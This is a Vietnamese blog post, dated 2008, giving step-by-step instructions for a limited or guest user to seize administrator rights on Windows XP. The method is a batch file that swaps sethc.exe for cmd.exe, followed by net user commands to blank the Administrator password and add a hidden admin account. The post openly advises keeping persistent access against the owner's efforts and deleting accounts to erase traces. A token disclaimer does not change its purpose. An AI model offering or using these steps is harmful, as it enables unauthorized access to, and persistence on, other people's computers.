Main » 2008 » Tháng Chín » 4 » Đoạt quyền Administrator trong Windows XP, hoàn toàn thủ công, không cần công cụ
Đoạt quyền Administrator trong Windows XP, hoàn toàn thủ công, không cần công cụ
09:33
Bài viết này hướng dẫn lấy pw Quản trị của máy tính trong trường hợp các bạn cần sử dụng máy tính ở quyền Admin trong khi chỉ được phép sử dụng máy ở dạng ... Guest hay Limited. Không khuyến khích đi phá hoại máy tính người khác.
Hiện
nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản
Administrator trong Windows bị quên mất. Có thể kể đến là dùng công cụ
hỗ trợ của đĩa Hiren Boot để xóa trắng mật khẩu của tài khoản
Administrator hay dùng các công cụ dò tìm mật khẩu trên Net. Tuy vậy,
không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc
như thế.... hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows.
Bước
1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift
để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm
để xem thử).
Bước
2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi
chương trình Notepad.exe. Copy đoạn mã của mình viết, past vào notepad,
Save lại với tên là Hackpass.bat
CODE cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
Sau đó nhấp kép chuột lên file Hackpass.bat để thực thi!
Đoạn mã này làm các nhiệm vụ sau:
1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk 2. Thay thế file sethc.exe bằng file cmd.exe
Đến
đây, bạn log off user đang dùng (Guest hoặc Limited user) rồi từ cửa sổ
chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command
Run được gọi thay vì chương trình StickyKey thì bạn đã thành công! Bạn
đang có toàn quyền với hệ thống với cửa sổ Command Run này. Chú ý là
bạn sẽ không thực hiện được các bước tiếp theo nếu thao tác trên cửa sổ
Command Run trong tài khoản Guest hay Limited mà không Log off nó như
Lãng khách vừa lưu ý.
Chương trình StickyKey đã được thay bằng Command Run
Thật
ra, với cách này, các bạn có thể biến đổi tùy ý các Users trên máy, kể
cả các Admin khác. Muốn đổi pw một user có sẵn trong máy, ta xem có
những users nào đang có trên máy (kể cả users ẩn):
CODE net user
Xóa trắng password của Administrator (hay tương tự với bất kì user nào):
CODE net user Administrator
Thêm một tài khoản SharingVN với mật khẩu là 123
CODE net user SharingVN 123 /add
Gán tài khoản SharingVN vào nhóm quản trị (sau bước này tài khoản SharingVN mới có quyền Adminitrators):
CODE net localgroup Administrators SharingVN /add
Nếu
bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản
mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần
khởi động lại máy!
Sau khi dùng xong tài khoản SharingVN, xóa
nó đi để giấu dấu vết (các thư mục và dữ liệu của User này vẫn còn
trong máy, để sau này ... tạo lại user ... dùng tiếp (kể ra ai tinh ý
sẽ thấy nó).
CODE net user SharingVN /delete
Cuối
cùng,
nếu thư mục system32 được bảo vệ bằng soft tương tự Folder Lock,
thì các bạn phải Reset acc Admin bằng Hiren's Boot CD (Đã có bài hướng
dẫn dùng Hiren's Boot USB, nghĩa là dùng USB thay vì CD trong
SharingVN, các bạn search lại nhé).
Khi reset xong Adminitrators pw, ta có thể chạy file Hackpass.bat ở
trên trong Safe Mode (đảm bảo việc sao lưu và đổi tên không có gì cản
trở bằng bất kì phần mềm gì) để sau này, không cần đăng nhập gì, cứ
Shift 5 lần là sẽ có cửa sổ Command cho ta ... tùy ý thao tác...
Tất nhiên, sau khi xóa trắng pw Adminitrators, chủ máy sẽ biết, và họ
sẽ có những thay đổi. Họ sẽ cố gắng tìm mọi cách ngăn cản chúng ta xâm
nhập máy họ, nhưng nếu cmd.exe (đã đổi tên) vẫn tồn tại trong System32,
thì ta vẫn hoàn toàn làm chủ tình thế. Nhớ là, tạo mới acc Admin xong,
nhớ xóa đi để xóa dấu vết.
Bài viết này hướng dẫn lấy pw Quản trị của máy tính trong trường hợp các bạn cần sử dụng máy tính ở quyền Admin trong khi chỉ được phép sử dụng máy ở dạng ... Guest hay Limited. Không khuyến khích đi phá hoại máy tính người khác.
